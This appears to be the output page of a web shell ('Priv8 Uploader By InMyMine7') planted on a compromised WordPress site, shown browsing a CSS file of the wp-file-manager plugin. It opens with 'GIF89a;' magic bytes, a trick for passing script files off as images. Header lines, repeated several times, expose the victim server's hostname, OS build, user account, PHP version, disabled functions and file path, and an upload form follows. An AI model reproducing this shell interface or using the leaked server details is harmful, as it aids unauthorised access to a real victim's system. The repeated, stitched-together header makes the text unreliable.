GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
Priv8 Uploader By InMyMine7
Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64
|
Server : Microsoft-IIS/10.0 System : Windows NT WIN-EIKGKM4PF33 10.0 build 14393 (Windows Server 2016) AMD64 User : hm77079 ( 0) PHP Version : 7.3.6 Disable Function : passthru,exec,system,popen,chroot,chgrp,chown,escapesh,ellcmd,escapeshellarg Directory : D:/www/hm77079/wwwroot/wp-content/plugins/wp-file-manager/lib/themes/light/css/ |
Upload File : |
/* view-list.css */
/* Wrapper for list view */
.elfinder .elfinder-cwd-wrapper-list {
/* */
}
/* List view table */
.elfinder .elfinder-cwd-wrapper-list table {
/* */
}
/* Column headings */
.elfinder .elfinder-cwd-wrapper-list table thead tr td {
color: #43536a;
}
.elfinder .elfinder-cwd-wrapper-list table thead tr td:not(:last-child) {
border-right: 1px solid #e5e5e5;
}
/* Hovered column heading */
.elfinder .elfinder-cwd-wrapper-list table thead tr td.ui-state-hover,
.elfinder .elfinder-cwd-wrapper-list table thead tr td:hover {
background: #d0dded;
}
/* Actively sorted column heading */
.elfinder .elfinder-cwd-wrapper-list table thead tr td.ui-state-active {
border-right: 1px solid #e5e5e5;
}
/* Table heading icons (mainly the sorter) */
.elfinder .elfinder-cwd-wrapper-list table tr td .ui-icon {
/* */
}
/* Table heading sorter up */
.elfinder .elfinder-cwd-wrapper-list table tr.ui-state-default td .ui-icon-triangle-1-n:before {
/* */
}
/* Table heading sorter down */
.elfinder .elfinder-cwd-wrapper-list table tr.ui-state-default td .ui-icon-triangle-1-s:before {
/* */
}
/* Files */
/* File */
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file td {
border: 1px solid transparent;
}
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file td:not(:first-child) {
color: #9d9d9d;
}
/* Filename */
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file .elfinder-cwd-filename {
/* */
}
/* Hovered file */
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file:hover,
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file.ui-state-hover, /* fix for 2.x */
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file.ui-state-hover:hover { /* fix for 2.1 */
background: #e5f3ff;
border-color: #e5f3ff;
}
/* Selected file */
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file.ui-selected {
background: #cce8ff;
}
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file.ui-selected td {
border-top: 1px solid #99d1ff;
border-bottom: 1px solid #99d1ff;
color : #fff;
}
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file.ui-selected td:first-child {
border-left: 1px solid #99d1ff;
}
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file.ui-selected td:last-child {
border-right: 1px solid #99d1ff;
}
/* Icons */
.elfinder .elfinder-cwd-wrapper-list .elfinder-cwd-file .elfinder-cwd-icon {
/* */
}
.elfinder .elfinder-cwd-icon.elfinder-cwd-icon-vnd-openxmlformats-officedocument-wordprocessingml-document {
background: url(../images/16px/text_file.svg) !important;
background-position: 2px 130px;
background: no-repeat;
background-size: 38px !important;
background-repeat: no-repeat !important;
}
.elfinder-cwd-wrapper-list .elfinder-cwd-icon.elfinder-cwd-icon-vnd-openxmlformats-officedocument-wordprocessingml-document{
background-size: 13px !important;
}